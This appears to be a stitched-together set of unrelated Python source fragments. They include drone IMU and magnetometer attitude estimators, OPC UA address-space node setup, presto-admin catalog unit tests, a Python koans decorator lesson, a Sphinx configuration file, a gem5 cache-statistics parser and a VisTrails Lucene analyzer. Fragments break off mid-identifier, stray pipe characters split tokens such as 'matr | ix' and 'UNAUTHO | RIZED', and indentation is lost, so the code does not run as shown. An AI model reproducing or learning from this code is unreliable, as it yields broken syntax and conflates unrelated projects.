rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
rz *= mul[2]
return lowpass(degrees(-asin(ry/sqrt(rx**2+ry**2+rz**2))),'_roll',smooth)
def pitch_estimate(RAW_IMU, GPS_RAW_INT=None,ATTITUDE=None, SENSOR_OFFSETS=None, ofs=None, mul=None, smooth=0.7):
'''estimate pitch from accelerometer'''
rx = RAW_IMU.xacc * 9.81 / 1000.0
ry = RAW_IMU.yacc * 9.81 / 1000.0
rz = RAW_IMU.zacc * 9.81 / 1000.0
if ATTITUDE is not None and GPS_RAW_INT is not None:
ry -= ATTITUDE.yawspeed * GPS_RAW_INT.vel*0.01
rz += ATTITUDE.pitchspeed * GPS_RAW_INT.vel*0.01
if SENSOR_OFFSETS is not None and ofs is not None:
rx += SENSOR_OFFSETS.accel_cal_x
ry += SENSOR_OFFSETS.accel_cal_y
rz += SENSOR_OFFSETS.accel_cal_z
rx -= ofs[0]
ry -= ofs[1]
rz -= ofs[2]
if mul is not None:
rx *= mul[0]
ry *= mul[1]
| rz *= mul[2]
return lowpass(degrees(asin(rx/sqrt(rx**2+ry**2+rz**2))),'_pitch',smooth)
def rotation(ATTITUDE):
'''return the current DCM rotation matr | ix'''
r = Matrix3()
r.from_euler(ATTITUDE.roll, ATTITUDE.pitch, ATTITUDE.yaw)
return r
def mag_rotation(RAW_IMU, inclination, declination):
'''return an attitude rotation matrix that is consistent with the current mag
vector'''
m_body = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
m_earth = Vector3(m_body.length(), 0, 0)
r = Matrix3()
r.from_euler(0, -radians(inclination), radians(declination))
m_earth = r * m_earth
r.from_two_vectors(m_earth, m_body)
return r
def mag_yaw(RAW_IMU, inclination, declination):
'''estimate yaw from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
y = degrees(y)
if y < 0:
y += 360
return y
def mag_pitch(RAW_IMU, inclination, declination):
'''estimate pithc from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
return degrees(p)
def mag_roll(RAW_IMU, inclination, declination):
'''estimate roll from mag'''
m = mag_rotation(RAW_IMU, inclination, declination)
(r, p, y) = m.to_euler()
return degrees(r)
def expected_mag(RAW_IMU, ATTITUDE, inclination, declination):
'''return expected mag vector'''
m_body = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
field_strength = m_body.length()
m = rotation(ATTITUDE)
r = Matrix3()
r.from_euler(0, -radians(inclination), radians(declination))
m_earth = r * Vector3(field_strength, 0, 0)
return m.transposed() * m_earth
def mag_discrepancy(RAW_IMU, ATTITUDE, inclination, declination=None):
'''give the magnitude of the discrepancy between observed and expected magnetic field'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
expected = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
mag = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
return degrees(expected.angle(mag))
def mag_inclination(RAW_IMU, ATTITUDE, declination=None):
'''give the magnitude of the discrepancy between observed and expected magnetic field'''
if declination is None:
import mavutil
declination = degrees(mavutil.mavfile_global.param('COMPASS_DEC', 0))
r = rotation(ATTITUDE)
mag1 = Vector3(RAW_IMU.xmag, RAW_IMU.ymag, RAW_IMU.zmag)
mag1 = r * mag1
mag2 = Vector3(cos(radians(declination)), sin(radians(declination)), 0)
inclination = degrees(mag1.angle(mag2))
if RAW_IMU.zmag < 0:
inclination = -inclination
return inclination
def expected_magx(RAW_IMU, ATTITUDE, inclination, declination):
'''estimate from mag'''
v = expected_mag(RAW_IMU, ATTITUDE, inclination, declination)
return v.x
def expected_magy(RAW_IMU, ATTITUDE, inclination, declination):
'''estimate from mag'''
v = expected_mag(RAW_IMU, ATTITUDE, inclin |
68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11197, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11197, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11198, 0)
node.BrowseName = QualifiedName('UpdateDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11198, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11198, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11199, 0)
node.BrowseName = QualifiedName('DeleteRawCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteRawCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11199, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11199, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11200, 0)
| node.BrowseName = QualifiedName('DeleteAtTimeCapability', | 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteAtTimeCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11200, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11200, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11281, 0)
node.BrowseName = QualifiedName('InsertEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11281, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11281, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11282, 0)
node.BrowseName = QualifiedName('ReplaceEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReplaceEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11282, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11282, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11283, 0)
node.BrowseName = QualifiedName('UpdateEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdateEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11283, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11283, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11192, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11502, 0)
node.BrowseName = QualifiedName('DeleteEventCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11192, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("DeleteEventCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
|
# Copyright (c) 2014 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permiss | ions and
# limitations under the License.
from openstack_dashboard import exceptions
#from solumclient.openstack.common.apiclient import exceptions as solumclient
NOT_FOUND = exceptions.NOT_FOUND
RECOVERABLE = exceptions.RECOVERABLE
# + (solumclient.ClientException,)
UNAUTHO | RIZED = exceptions.UNAUTHORIZED
|
express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
tests for catalog module
"""
import os
import fabric.api
from fabric.operations import _AttributeString
from mock import patch
from prestoadmin import catalog
from prestoadmin.util import constants
from prestoadmin.util.exception import ConfigurationError, \
ConfigFileNotFoundError
from prestoadmin.standalone.config import PRESTO_STANDALONE_USER_GROUP
from prestoadmin.util.local_config_util import get_catalog_directory
from tests.unit.base_unit_case import BaseUnitCase
class TestCatalog(BaseUnitCase):
def setUp(self):
super(TestCatalog, self).setUp(capture_output=True)
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_not_exist(self, isfile_mock):
isfile_mock.return_value = False
self.assertRaisesRegexp(ConfigurationError,
'Configuration for catalog dummy not found',
catalog.add, 'dummy')
@patch('prestoadmin.catalog.validate')
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_exists(self, isfile_mock, deploy_mock, validate_mock):
isfile_mock.return_value = True
catalog.add('tpch')
filenames = ['tpch.properties']
deploy_mock.assert_called_with(filenames,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
validate_mock.assert_called_with(filenames)
@pat | ch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.cat | alog.os.path.isdir')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.validate')
def test_add_all(self, mock_validate, listdir_mock, isdir_mock,
deploy_mock):
catalogs = ['tpch.properties', 'another.properties']
listdir_mock.return_value = catalogs
catalog.add()
deploy_mock.assert_called_with(catalogs,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_all_fails_if_dir_not_there(self, isdir_mock, deploy_mock):
isdir_mock.return_value = False
self.assertRaisesRegexp(ConfigFileNotFoundError,
r'Cannot add catalogs because directory .+'
r' does not exist',
catalog.add)
self.assertFalse(deploy_mock.called)
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
@patch('prestoadmin.catalog.os.remove')
def test_remove(self, local_rm_mock, exists_mock, sudo_mock):
script = ('if [ -f /etc/presto/catalog/tpch.properties ] ; '
'then rm /etc/presto/catalog/tpch.properties ; '
'else echo "Could not remove catalog \'tpch\'. '
'No such file \'/etc/presto/catalog/tpch.properties\'"; fi')
exists_mock.return_value = True
fabric.api.env.host = 'localhost'
catalog.remove('tpch')
sudo_mock.assert_called_with(script)
local_rm_mock.assert_called_with(get_catalog_directory() +
'/tpch.properties')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_failure(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
out = _AttributeString()
out.succeeded = False
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] Failed to remove catalog tpch.',
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_no_such_file(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
error_msg = ('Could not remove catalog tpch: No such file ' +
os.path.join(get_catalog_directory(), 'tpch.properties'))
out = _AttributeString(error_msg)
out.succeeded = True
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] %s' % error_msg,
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_warning_if_connector_dir_empty(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
listdir_mock.return_value = []
catalog.add()
self.assertEqual('\nWarning: Directory %s is empty. No catalogs will'
' be deployed\n\n' % get_catalog_directory(),
self.test_stderr.getvalue())
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_permission_denied(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
error_msg = ('Permission denied')
listdir_mock.side_effect = OSError(13, error_msg)
fabric.api.env.host = 'localhost'
self.assertRaisesRegexp(SystemExit, '\[localhost\] %s' % error_msg,
catalog.add)
@patch('prestoadmin.catalog.os.remove')
@patch('prestoadmin.catalog.remove_file')
def test_remove_os_error(self, remove_file_mock, remove_mock):
fabric.api.env.host = 'localhost'
error = OSError(13, 'Permission denied')
remove_mock.side_effect = error
self.assertRaisesRegexp(OSError, 'Permission denied',
catalog.remove, 'tpch')
@patch('prestoadmin.catalog.secure_create_directory')
@patch('prestoadmin.util.fabricapi.put')
def test_deploy_files(self, put_mock, create_dir_mock):
local_dir = '/my/local/dir'
remote_dir = '/my/remote/dir'
catalog.deploy_files(['a', 'b'], local_dir, remote_dir,
PRESTO_STANDALONE_USER_GROUP)
create_dir_mock.assert_called_with(remote_dir, PRESTO_STANDALONE_USER_GROUP)
put_mock.assert_any_call('/my/local/dir/a', remote_dir, use_sudo=True,
mode=0600)
put_mock.assert_any_call('/my/local/dir/b', remote_dir, use_sudo=True,
mode=0600)
@patch('prestoadmin.catalog.os.path.isfile')
@patch("__builtin__.open")
def test_validate(self, open_mock, is_file_mock):
is_file_mock.return_value = True
file_obj = open_mock.return_value.__enter__.return_value
file_obj.read.return_value = 'connector.noname=example'
self.assertRaisesRegexp(ConfigurationError,
'Catalog configuration example.properties '
'does not contain connector.name',
catalog.add, 'example')
@patch('prestoadmin.catalog.os.path.isfile')
def test_validate_fail(self, is_file_mock):
is_file_mock.return_value = True
self.assertRaisesRegexp(
SystemExit,
'Error validating ' + os.path.join(get_catalog_directory(), 'example.properties') + '\n\n'
'Underlying exception:\n No such file or directory',
catalog.add, 'example')
@patch('prestoadmin.catalog.get')
@patch('prestoadmin.catalog.files.exists')
@patch('prestoadmin.catalog.ensure_directory_exists')
@patch('prestoadmin.catalog.os.path.exists')
def test_gather_connectors(self, path_exists, ensure_dir_exists,
files_exists, get_mock):
fabric.api.env.host = 'any_host |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutDecoratingWithFunctions(Koan):
def addcowbell(fn):
fn.wow_factor = 'COWBELL BABY!'
return fn
@addcowbell
def | mediocre_song(self):
return "o/~ We all live in a broken submarine o/~"
def test_decorato | rs_can_modify_a_function(self):
self.assertMatch(__, self.mediocre_song())
self.assertEqual(__, self.mediocre_song.wow_factor)
# ------------------------------------------------------------------
def xmltag(fn):
def func(*args):
return '<' + fn(*args) + '/>'
return func
@xmltag
def render_tag(self, name):
return name
def test_decorators_can_change_a_function_output(self):
self.assertEqual(__, self.render_tag('llama'))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Winton Kafka Streams Python documentation build configuration file, created by
# sphinx-quickstart on Tue May 16 21:00:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# Get the project root dir
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import winton_kafka_streams
from mock import MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return MagicMock()
MOCK_MODULES = ['confluent_kafka', 'confluent_kafka.cimpl', 'confluent_kafka.avro']
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Winton Kafka Streams Python'
copyright = '2017, Winton Group'
author = 'Winton Group'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from setuptools_scm import get_version
version = release = get_version(root='..')
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the built | in "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'WintonKafkaStreamsPythondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
| # 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'WintonKafkaStreamsPython.tex', 'Winton Kafka Streams Python Documentation',
'Winton Group', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'wintonkafkastreamspython', 'Winton Kafka Streams Python Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'WintonKafkaStreamsPython', 'Winton Kafka Streams Python Documentation',
author, 'WintonKafkaStreamsPython', 'One line description of project.',
'Miscellaneous'),
]
|
"""
Project Configuration Importer
Handles the importing the project configuration from a separate location
and validates the version against the specified expected version.
NOTE: If you update this file or any others in scripts and require a
NEW variable in project_cfg, then you need to UPDATE THE EXPECTED_CFG_VERSION
That way, if someone tries to use the new scripts with an old cfg, they'll
get a warning.
"""
import importlib
import os
import sys
PROJECT_CFG_DIR = os.path.realpath(os.path.dirname(__file__) + "/../../cfg/")
PROJECT_CFG_NAME = "project_cfg"
EXPECTED_CFG_VERSION = 1.1
def get_project_cfg():
""" |
Returns the project configuration module
"""
sys.path.append(PROJECT_CFG_DIR)
try:
project_cfg_module = importlib.import_module(PROJECT_CFG_NAME)
except:
raise FileNotFoundError("\n\n================================= ERROR ========================================"
"\nUnable to import project configuration: " + PROJECT_CFG | _DIR + "/" + PROJECT_CFG_NAME + ".py"
"\n================================================================================\n")
_verify_correct_version(project_cfg_module)
return project_cfg_module
def _verify_correct_version(project_cfg_module):
is_correct_version = False
if project_cfg_module.__CFG_VERSION__ == EXPECTED_CFG_VERSION:
is_correct_version = True
else:
raise Exception("\n\n================================= ERROR ========================================"
"\nIncorrect project configuration version: " + str(project_cfg_module.__CFG_VERSION__) +
"\n Development environment expected: " + str(EXPECTED_CFG_VERSION) +
"\n================================================================================\n")
return is_correct_version
|
#!/usr/bin/env python
import sys
import re
import os
inFilename = sys.argv[1]
if os.path.isfile(inFilename):
namelength = inFilename.rfind(".")
name = inFilename[0:namelength]
exten = inFilename[namelength:]
outFilename = name+"-cachecmp"+exten
print "inFilename:", inFilename
print "outFilename:", outFilename
fpRead = open(inFilename, "r")
fpWrite = open(outFilename, "w+")
dtbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.dtb.walker).* ([0-9]+)')
dtbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.dtb.walker).* ([0-9]+)')
itbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.itb.walker).* ([0-9]+)')
itbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.itb.walker).* ([0-9]+)')
overallhitsPattern = re.compile(r'.*(l2.overall_hits::total).* ([0-9]+)')
cachehitsPattern = re.compile(r'.*(l2.cachehits).* ([0-9]+)')
threadbeginPattern = re.compile(r'.*Begin Simulation Statistics.*')
threadendPattern =re.compile(r'.*End Simulation Statistics.*')
lines = fpRead.readline()
while lines:
threadbeginmatch = threadbeginPattern.match(lines)
if threadbeginmatch:
dtbwalker1=0
itbwalker1=0
dtbwalker2=0
itbwalker2=0
overallhits=0
cachehits=0
gem5hits=0
ratio = 0
threadlines = fpRead.readline()
while threadlines:
dtbwalker1match = dtbwalker1Pattern.search(threadlines)
itbwalker1match = itbwalker1Pattern.search(threadlines)
dtbwalker2match = dtbwalker2Pattern.search(threadlines)
itbwalker2match = itbwalker2Pattern.search(threadlines)
overallhitsmatch = overallhitsPattern.search(threadlines)
cachehitsmatch = cachehitsPattern.search(threadlines)
threadendmatch = threadendPattern.match(threadlines)
if dtbwalker1match:
dtbwalker1=int(dtbwalker1match.group(2))
if itbwalker1match:
it | bwalker1=int(itbwalker1match.group(2))
if dtbwalker2match:
dtbwalker2=int(dtbwalker2match.group(2))
if itbwalker2match:
itbwalker2=int(itbwalker2match.group(2))
if overallhitsmatch:
overallhits=int(overallhitsmatch.group(2))
if cachehitsmatch:
cachehits=int(cachehitsmatch.group(2))
if threadendmatch:
gem5hits=overallhits-(dtbwalker1+dtbwalker2+itbwalker1+itbwalker2)
absval = abs(gem5hits-cachehits)
| if gem5hits!=0:
ratio=(absval/float(gem5hits))*100
else:
ratio=float(0)
fpWrite.write("gem5hit %d " % gem5hits)
fpWrite.write("cachehit %d " % cachehits)
fpWrite.write("ratio %.2f%%" % ratio)
fpWrite.write("\n")
break
threadlines = fpRead.readline()
lines = fpRead.readline()
fpRead.close()
fpWrite.close()
|
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS S | OFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
import re
from lucene import *
im | port lucene
dir(lucene)
class vistrailAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = vistrailFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
class stemmingAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = LowerCaseFilter(result)
